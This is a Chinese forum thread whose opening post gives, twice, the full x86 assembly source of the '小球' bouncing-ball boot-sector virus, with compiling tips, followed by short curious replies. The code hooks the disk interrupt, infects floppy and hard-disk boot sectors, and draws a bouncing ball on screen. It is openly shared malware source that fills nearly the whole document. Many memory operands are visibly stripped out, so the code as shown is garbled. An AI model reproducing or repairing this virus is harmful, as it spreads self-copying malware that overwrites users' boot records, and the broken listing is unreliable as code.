标题: 小球病毒源代码 [打印本页]
作者: kickout 时间: 2002-10-28 00:00 标题: 小球病毒源代码
这可是我在学校时从图书馆里好多好多书里好不容易找到的唯一一个病毒源代码,一个一个字抄在笔记本上,然后再一个一个字符敲进计算机里,要用tasm编译,masm不行。另外可能有些语句不合法,要变通一下。我是在我的计算机老师莫老师的指导下才编译通过的。(巧得很,我的老师也姓莫,和MYS老师同姓,不过他是MJC,呵呵。。。)
=========================
cseg segment
assume cs:cseg
org 7c00h
main proc far
;0000:7c00---------
stav: jmp start
db 49h, 42h, 4Dh, 20h, 20h,37h, 2Eh, 30h, 00h, 02h, 04h, 01h, 00h
db 02h, 00h, 02h, 07h,0A3h,0F8h, 29h, 00h,11h, 00h, 04h, 00h, 11h, 00h, 0FFh,0FFh
;0000:7c1e---------
start:
xor ax,ax
mov ss,ax
mov sp,7c00h
mov ds,ax
mov ax,ds:
sub ax,0002h
mov word ptr ds:,ax
mov cl,06h
shl ax,cl
sub ax,07c0h
;7c37-------------------
mov es,ax
mov si,7c00h
mov di,si
mov cx,0100h
repz movsw
; mov cs,ax
; push ax ;let the two line to complish 'mov cs,ax'
; pop cs
jmp es:$+2
;97c0:7c45--------------------
push cs
pop ds
call comd1 ;7c4a
;7c4a-------------
comd1:
xor ah,ah
int 13
and byte ptr ,80h
mov bx,
push cs
pop ax
sub ax,0020h
mov es,ax
call con2 ;7c9d
mov bx,
inc bx
mov ax,0ffc0h
mov es,ax
call con2 ;7c9d
xor ax,ax
mov ,al
mov ds,ax
;7c75---------------------
mov ax,
mov bx,
mov si,word ptr
mov word ptr,si ;7cd0 Need register in expression
mov ,cs
push cs
pop ds
mov ,ax
mov ,bx
mov dl,
jmp stav ;000:7c00h
;7c98------------------------
con1:
mov ax,0301h
jmp con21 ;7ca0
;7c9d---------------
con2:
mov ax,0201h
;7ca0-----------------
con21:
xchg bx,ax
add ax,
xor dx,dx
div word ptr
inc dl
mov ch,dl
xor dx,dx
div word ptr
mov cl,06h
shl ah,cl
or ah,ch
mov cx,ax
xchg ch,cl
mov dh,dl
mov ax,bx
;7cc3-----------------
con3:
mov dl,
mov bx,8000h
int 13
jnb emd
pop ax
;7ccf-------------------
emd:
ret
;7cd0---------------
push ds
push es
push ax
push bx
push cx
push dx
push cs
pop ds
push cs
pop es
;7cda----------------
test byte ptr ,01h
jnz go1 ;7d23
cmp ah,02h
jnz go1 ;7d23
cmp ,dl
mov ,dl
jnz go2 ;7d12
;7cf0------------------
xor ah,ah
int 1ah
test dh,7fh
jnz go3 ;7d03
test dl,0f0h
jnz go3 ;7d03
push dx
call show ;7eb3
pop dx
;7d03--------------
go3:
mov cx,dx
sub dx,
mov ,cx
sub dx,+24h
jb go1 ;7d23
;7d12-----------------------------
go2:
or byte ptr ,01h
push si
push di
call infect ;7d2e
;7d1c-----------------
pop di
pop si
and byte ptr,0feh
;7d23------------
go1:
pop dx
pop cx
pop dx
pop ax
pop es
pop ds
jmp dword ptr ;c800:051a bios int 13h Illegal number
i13:dw 51ah
dw 0c800h
;7d2e-------------------------------
infect:
mov ax,0201h
mov dh, 00h
mov cx,0001h
call con3 ;7cc3
test byte ptr ,80h
jz go4 ;7d63
mov si ,81beh
mov cx,0004h
;7d46-----------------
loop1:
cmp byte ptr ,1
jz go5 ;7d58
cmp byte ptr,4
jz go5 ;7d58
add si,+10h
loop loop1
ret
;7d58--------------------------
go5:
mov dx,
mov cx,
mov ax,0201h
call con3 ;7cc3
;7d63---------------
go4:
mov si,8002h
mov di,word ptr ;7c02
mov cx,001ch
repz
movsb
;7d6e------------------------- have infected ?
cmp word ptr ,1357h
jnz go6 ;7d8b
cmp byte ptr ,00h
jnz go7 ;7d8a
mov ax,
mov ,ax
mov si,
jmp go8 ;7e92
;7d8a---------------------------
go7:
ret
;----------
;7d8b---------------------------------
go6:
cmp word ptr ,0200h
jnz go7 ;7d8a
cmp byte ptr,02h
jb go7 ;7d8a
mov cx,
mov al,
cbw
mul word ptr
add cx,ax
mov ax,0020h
mul word ptr
add ax,01ffh
mov bx,0200h
div bx
add cx,ax
mov ,cx
mov ax,
sub ax,
mov bl,
xor dx,dx
xor bh,bh
div bx
inc ax
mov di,ax
and byte ptr,0fbh
cmp ax,0ff0h
jbe go9 ;7de0
or byte ptr ,04h
;7de0---------------
go9:
mov si,0001h
mov bx,
dec bx
mov ,bx
mov byte ptr ,0feh
jmp go10 ;7e00
DB 5bh, 03h, 00h, 57h, 13h, 55h,0aah
;7e00-----------------
go10:
inc word ptr
mov bx,
add byte ptr ,02h
call con2 ;7c9d
jmp go11 ;7e4b
;7e12---------------------
go16:
mov ax,0003h
test byte ptr,04h
jz go12 ;7e1d
inc ax
;7e1d---------------
go12:
mul si
shr ax,1
sub ah,
mov bx,ax
cmp bx,01ffh
jnb go10 ;7e00
mov dx,
test byte ptr ,04h
jnz go13 ;7e45
mov cl,04h
test si,0001h
jz go14 ;7e42
shr dx,cl
;7e42------------------------
go14:
and dh,0fh
;7e45-----------------
go13:
test dx,0ffffh
jz go15 ;7e51
;7e4b-------------
go11:
inc si
cmp si ,di
jbe go16 ;7e12
ret
;7e51-----------------
go15:
mov dx,0fff7h
test byte ptr ,04h
jnz go17 ;7e68
and dh ,0fh
mov cl,04h
test si,0001h
jz go17 ;7e68
shl dx,cl
;7e68----------------------
go17:
or ,dx
mov bx,
call con1 ;7c98
mov ax,si
sub ax,0002h
mov bl,
xor bh,bh
mul bx
add ax,
mov si,ax
mov bx,0000h
call con2 ;7c9d
mov bx,si
inc bx
call con1 ;7c98
;7e92----------
go8:
mov bx,si
mov ,si
push cs
pop ax
sub ax,0020h
mov es,ax
call con1 ;7c98
;7ea2-----------------
push cs
pop ax
sub ax,0040h
mov es,ax
mov bx,0000h
call con1 ;7c98
ret
;---------------------------------------------
; 02 22
nop
;7eb3-------------------------------------
show:
test byte ptr,02
jnz go18 ;7ede
or byte ptr,02 ;set show mark
mov ax,0000h
mov ds,ax
mov ax,
mov bx,
lea si,new1c
mov word ptr ,si ;7edf Need register in expression
mov ,cs
push cs
pop ds
mov ,ax
mov ,bx
;7ede-------------
go18:
ret
;7edf------------------------------------
new1c:
push ds
push ax
push bx
push cx
push dx
push cs
pop ds
mov ah,0fh
int 10h
mov bl,bl
cmp bx,
jz go19 ;7f27
mov ,bx
dec ah
mov ,ah
mov ah,01h
cmp bl,07h
jnz go20 ;7f05
dec ah
;7f05--------------------------
go20:
cmp bl,04h
jnb go21 ;7f0c
dec ah
;7f0c---------------------
go21:
mov ,ah
mov word ptr ,0101h
mov word ptr ,0101h
mov ah,03h
push dx
mov dx,
jmp go22 ;7f4a
;7f27---------------------------
go19:
mov ah,03h
int 10h
int 10h
push dx
mov ah,02h
mov dx, ; OR ?
int 10h
mov ax,
cmp byte ptr ,01h
jnz go23 ;7f41
mov ax,8307h
;7f41-------------------------
go23:
mov bl,ah
mov cx,0001h
mov ah,09h
int 10h
;7f4a----------------------
go22:
mov cx,
cmp dh,00h
jnz go24 ;7f58
xor ch,0ffh
inc ch
;7f58------------------------
go24:
cmp dh,18h
jnz go25 ;7f62
xor ch,0ffh
inc ch
;7f62---------------------
go25:
cmp dl,00h
jnz go26 ;7f6c
xor cl,0ffh
inc cl
;7f6c-----------------------
go26:
cmp dl,
jnz go27 ;7f77
xor cl,0ffh
inc cl
;7f77-------------------
go27:
cmp cx,
jnz go28 ;7f94
mov ax,
and al,07h
cmp al,03h
jnz go29 ;7f8b
xor ch,0ffh
inc ch
;7f8b-------------------
go29:
cmp al,05h
jnz go28 ;7f94
xor cl,0ffh
inc cl
;7f94--------------------------
go28:
add dl,cl
add dh,ch
mov ,cx
mov ,dx
mov ah,02h
int 10h
mov ,ax
mov bl,ah
cmp byte ptr ,01h
jnz go30 ;7fb6
mov bl,83h
;7fb6---------------------
go30:
mov cx,0001h
mov ax,0907h
int 10h
pop dx
mov ah,02h
int 10h
pop dx
pop cx
pop bx
pop ax
pop ds
jmp dword ptr ;f000:fea5
my: dw 0fea5h
dw 0f000h
DB 00h,03h,4Bh
DB 0Dh,0FFh,0FFh,01h,06h,00h,4Fh,0B7h,0B7h,0B7h,0B6h,40h,40h,88h,0DEh,0E6h
DB 5Ah,0ACh,0D2h,0E4h,0EAh,0E6h,40h,50h,0ECh,40h,64h,5Ch,60h,52h,40h,40h
DB 40h,40h,64h,62h,5Eh,62h,60h,5Eh,70h,6Eh,40h,41h,0B7h,0B7h,0B7h,0B6h
;7fcd-----------
main endp
cseg ends
end stav
===================================
看不懂我也没办法,我也忘光了。。。
=========================
cseg segment
assume cs:cseg
org 7c00h
main proc far
;0000:7c00---------
stav: jmp start
db 49h, 42h, 4Dh, 20h, 20h,37h, 2Eh, 30h, 00h, 02h, 04h, 01h, 00h
db 02h, 00h, 02h, 07h,0A3h,0F8h, 29h, 00h,11h, 00h, 04h, 00h, 11h, 00h, 0FFh,0FFh
;0000:7c1e---------
start:
xor ax,ax
mov ss,ax
mov sp,7c00h
mov ds,ax
mov ax,ds:
sub ax,0002h
mov word ptr ds:,ax
mov cl,06h
shl ax,cl
sub ax,07c0h
;7c37-------------------
mov es,ax
mov si,7c00h
mov di,si
mov cx,0100h
repz movsw
; mov cs,ax
; push ax ;let the two line to complish 'mov cs,ax'
; pop cs
jmp es:$+2
;97c0:7c45--------------------
push cs
pop ds
call comd1 ;7c4a
;7c4a-------------
comd1:
xor ah,ah
int 13
and byte ptr ,80h
mov bx,
push cs
pop ax
sub ax,0020h
mov es,ax
call con2 ;7c9d
mov bx,
inc bx
mov ax,0ffc0h
mov es,ax
call con2 ;7c9d
xor ax,ax
mov ,al
mov ds,ax
;7c75---------------------
mov ax,
mov bx,
mov si,word ptr
mov word ptr,si ;7cd0 Need register in expression
mov ,cs
push cs
pop ds
mov ,ax
mov ,bx
mov dl,
jmp stav ;000:7c00h
;7c98------------------------
con1:
mov ax,0301h
jmp con21 ;7ca0
;7c9d---------------
con2:
mov ax,0201h
;7ca0-----------------
con21:
xchg bx,ax
add ax,
xor dx,dx
div word ptr
inc dl
mov ch,dl
xor dx,dx
div word ptr
mov cl,06h
shl ah,cl
or ah,ch
mov cx,ax
xchg ch,cl
mov dh,dl
mov ax,bx
;7cc3-----------------
con3:
mov dl,
mov bx,8000h
int 13
jnb emd
pop ax
;7ccf-------------------
emd:
ret
;7cd0---------------
push ds
push es
push ax
push bx
push cx
push dx
push cs
pop ds
push cs
pop es
;7cda----------------
test byte ptr ,01h
jnz go1 ;7d23
cmp ah,02h
jnz go1 ;7d23
cmp ,dl
mov ,dl
jnz go2 ;7d12
;7cf0------------------
xor ah,ah
int 1ah
test dh,7fh
jnz go3 ;7d03
test dl,0f0h
jnz go3 ;7d03
push dx
call show ;7eb3
pop dx
;7d03--------------
go3:
mov cx,dx
sub dx,
mov ,cx
sub dx,+24h
jb go1 ;7d23
;7d12-----------------------------
go2:
or byte ptr ,01h
push si
push di
call infect ;7d2e
;7d1c-----------------
pop di
pop si
and byte ptr,0feh
;7d23------------
go1:
pop dx
pop cx
pop dx
pop ax
pop es
pop ds
jmp dword ptr ;c800:051a bios int 13h Illegal number
i13:dw 51ah
dw 0c800h
;7d2e-------------------------------
infect:
mov ax,0201h
mov dh, 00h
mov cx,0001h
call con3 ;7cc3
test byte ptr ,80h
jz go4 ;7d63
mov si ,81beh
mov cx,0004h
;7d46-----------------
loop1:
cmp byte ptr ,1
jz go5 ;7d58
cmp byte ptr,4
jz go5 ;7d58
add si,+10h
loop loop1
ret
;7d58--------------------------
go5:
mov dx,
mov cx,
mov ax,0201h
call con3 ;7cc3
;7d63---------------
go4:
mov si,8002h
mov di,word ptr ;7c02
mov cx,001ch
repz
movsb
;7d6e------------------------- have infected ?
cmp word ptr ,1357h
jnz go6 ;7d8b
cmp byte ptr ,00h
jnz go7 ;7d8a
mov ax,
mov ,ax
mov si,
jmp go8 ;7e92
;7d8a---------------------------
go7:
ret
;----------
;7d8b---------------------------------
go6:
cmp word ptr ,0200h
jnz go7 ;7d8a
cmp byte ptr,02h
jb go7 ;7d8a
mov cx,
mov al,
cbw
mul word ptr
add cx,ax
mov ax,0020h
mul word ptr
add ax,01ffh
mov bx,0200h
div bx
add cx,ax
mov ,cx
mov ax,
sub ax,
mov bl,
xor dx,dx
xor bh,bh
div bx
inc ax
mov di,ax
and byte ptr,0fbh
cmp ax,0ff0h
jbe go9 ;7de0
or byte ptr ,04h
;7de0---------------
go9:
mov si,0001h
mov bx,
dec bx
mov ,bx
mov byte ptr ,0feh
jmp go10 ;7e00
DB 5bh, 03h, 00h, 57h, 13h, 55h,0aah
;7e00-----------------
go10:
inc word ptr
mov bx,
add byte ptr ,02h
call con2 ;7c9d
jmp go11 ;7e4b
;7e12---------------------
go16:
mov ax,0003h
test byte ptr,04h
jz go12 ;7e1d
inc ax
;7e1d---------------
go12:
mul si
shr ax,1
sub ah,
mov bx,ax
cmp bx,01ffh
jnb go10 ;7e00
mov dx,
test byte ptr ,04h
jnz go13 ;7e45
mov cl,04h
test si,0001h
jz go14 ;7e42
shr dx,cl
;7e42------------------------
go14:
and dh,0fh
;7e45-----------------
go13:
test dx,0ffffh
jz go15 ;7e51
;7e4b-------------
go11:
inc si
cmp si ,di
jbe go16 ;7e12
ret
;7e51-----------------
go15:
mov dx,0fff7h
test byte ptr ,04h
jnz go17 ;7e68
and dh ,0fh
mov cl,04h
test si,0001h
jz go17 ;7e68
shl dx,cl
;7e68----------------------
go17:
or ,dx
mov bx,
call con1 ;7c98
mov ax,si
sub ax,0002h
mov bl,
xor bh,bh
mul bx
add ax,
mov si,ax
mov bx,0000h
call con2 ;7c9d
mov bx,si
inc bx
call con1 ;7c98
;7e92----------
go8:
mov bx,si
mov ,si
push cs
pop ax
sub ax,0020h
mov es,ax
call con1 ;7c98
;7ea2-----------------
push cs
pop ax
sub ax,0040h
mov es,ax
mov bx,0000h
call con1 ;7c98
ret
;---------------------------------------------
; 02 22
nop
;7eb3-------------------------------------
show:
test byte ptr,02
jnz go18 ;7ede
or byte ptr,02 ;set show mark
mov ax,0000h
mov ds,ax
mov ax,
mov bx,
lea si,new1c
mov word ptr ,si ;7edf Need register in expression
mov ,cs
push cs
pop ds
mov ,ax
mov ,bx
;7ede-------------
go18:
ret
;7edf------------------------------------
new1c:
push ds
push ax
push bx
push cx
push dx
push cs
pop ds
mov ah,0fh
int 10h
mov bl,bl
cmp bx,
jz go19 ;7f27
mov ,bx
dec ah
mov ,ah
mov ah,01h
cmp bl,07h
jnz go20 ;7f05
dec ah
;7f05--------------------------
go20:
cmp bl,04h
jnb go21 ;7f0c
dec ah
;7f0c---------------------
go21:
mov ,ah
mov word ptr ,0101h
mov word ptr ,0101h
mov ah,03h
push dx
mov dx,
jmp go22 ;7f4a
;7f27---------------------------
go19:
mov ah,03h
int 10h
int 10h
push dx
mov ah,02h
mov dx, ; OR ?
int 10h
mov ax,
cmp byte ptr ,01h
jnz go23 ;7f41
mov ax,8307h
;7f41-------------------------
go23:
mov bl,ah
mov cx,0001h
mov ah,09h
int 10h
;7f4a----------------------
go22:
mov cx,
cmp dh,00h
jnz go24 ;7f58
xor ch,0ffh
inc ch
;7f58------------------------
go24:
cmp dh,18h
jnz go25 ;7f62
xor ch,0ffh
inc ch
;7f62---------------------
go25:
cmp dl,00h
jnz go26 ;7f6c
xor cl,0ffh
inc cl
;7f6c-----------------------
go26:
cmp dl,
jnz go27 ;7f77
xor cl,0ffh
inc cl
;7f77-------------------
go27:
cmp cx,
jnz go28 ;7f94
mov ax,
and al,07h
cmp al,03h
jnz go29 ;7f8b
xor ch,0ffh
inc ch
;7f8b-------------------
go29:
cmp al,05h
jnz go28 ;7f94
xor cl,0ffh
inc cl
;7f94--------------------------
go28:
add dl,cl
add dh,ch
mov ,cx
mov ,dx
mov ah,02h
int 10h
mov ,ax
mov bl,ah
cmp byte ptr ,01h
jnz go30 ;7fb6
mov bl,83h
;7fb6---------------------
go30:
mov cx,0001h
mov ax,0907h
int 10h
pop dx
mov ah,02h
int 10h
pop dx
pop cx
pop bx
pop ax
pop ds
jmp dword ptr ;f000:fea5
my: dw 0fea5h
dw 0f000h
DB 00h,03h,4Bh
DB 0Dh,0FFh,0FFh,01h,06h,00h,4Fh,0B7h,0B7h,0B7h,0B6h,40h,40h,88h,0DEh,0E6h
DB 5Ah,0ACh,0D2h,0E4h,0EAh,0E6h,40h,50h,0ECh,40h,64h,5Ch,60h,52h,40h,40h
DB 40h,40h,64h,62h,5Eh,62h,60h,5Eh,70h,6Eh,40h,41h,0B7h,0B7h,0B7h,0B6h
;7fcd-----------
main endp
cseg ends
end stav
===================================
看不懂我也没办法,我也忘光了。。。
作者: sunkai 时间: 2008-12-25 14:54
너무 어렵다 이해 못해
作者: 541350555 时间: 2009-12-21 13:47
我是个新人 能告诉我小球病毒是干什么的啊
作者: lyqq1982 时间: 2009-12-25 16:21
做什么用的 这个病毒
作者: zhgwbzhd 时间: 2009-12-28 21:04
恩,有些东西确是比较难得。
比如以前我就为了找到 mov ax,ds:[0413h]东东花了很长的时间。
比如以前我就为了找到 mov ax,ds:[0413h]东东花了很长的时间。
作者: yuchao881209 时间: 2010-1-5 16:02 标题: 不懂
什么是小球病毒
作者: zsbjxy 时间: 2010-2-21 16:29
能算的上是病毒中的祖先了!
作者: 921152916 时间: 2010-5-6 21:17
不懂的路过
作者: enjoyer 时间: 2010-5-9 00:16
多任务应用的雏形